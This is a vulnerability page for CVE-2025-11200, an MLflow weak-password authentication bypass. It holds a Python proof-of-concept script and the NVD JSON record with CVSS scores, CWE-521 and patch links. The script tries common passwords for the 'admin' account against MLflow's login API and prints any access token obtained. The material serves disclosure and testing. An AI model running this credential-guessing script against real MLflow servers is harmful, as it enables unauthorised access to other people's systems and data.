CVE-2025-11200

# CVE-2025-11200 MLflow Authentication Bypass PoC # This PoC demonstrates the weak password requirement vulnerability # Use responsibly and only on systems you have permission to test import requests import sys TARGET_URL = "http://target-mlflow-server:5000" def test_auth_bypass(): """ Test for CVE-2025-11200: MLflow weak password authentication bypass The vulnerability allows bypassing authentication due to weak password requirements """ # Common weak passwords to test weak_passwords = [ "password", "123456", "admin", "mlflow", "12345678", "qwerty", "admin123", "" ] login_endpoint = f"{TARGET_URL}/api/2.0/mlflow/authentication/login" print(f"[*] Testing MLflow authentication bypass vulnerability...") print(f"[*] Target: {TARGET_URL}") for password in weak_passwords: payload = { "username": "admin", "password": password } try: response = requests.post(login_endpoint, json=payload, timeout=10) if response.status_code == 200: data = response.json() if data.get("access_token"): print(f"[!] VULNERABLE: Authentication bypassed with password: '{password}'") print(f"[!] Access token obtained: {data.get('access_token')[:20]}...") return True else: print(f"[-] Password '{password}' failed") except Exception as e: print(f"[!] Error testing password '{password}': {e}") print("[*] No weak password found, but vulnerability may still exist") return False if __name__ == "__main__": test_auth_bypass()

{"cve": {"id": "CVE-2025-11200", "sourceIdentifier": "[email protected]", "published": "2025-10-29T20:15:35.543", "lastModified": "2025-12-31T01:06:20.083", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "MLflow Weak Password Requirements Authentication Bypass Vulnerability. This vulnerability allows remote attackers to bypass authentication on affected installations of MLflow. Authentication is not required to exploit this vulnerability.\n\nThe specific flaw exists within the handling of passwords. The issue results from weak password requirements. An attacker can leverage this vulnerability to bypass authentication on the system. Was ZDI-CAN-26916."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}], "cvssMetricV30": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.0", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.2, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-521"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:lfprojects:mlflow:*:*:*:*:*:*:*:*", "versionEndIncluding": "2.21.0", "matchCriteriaId": "75AF2251-F08D-4033-8EE3-7777D6A5436B"}]}]}], "references": [{"url": "https://github.com/mlflow/mlflow/commit/1f74f3f24d8273927b8db392c23e108576936c54", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://www.zerodayinitiative.com/advisories/ZDI-25-932/", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}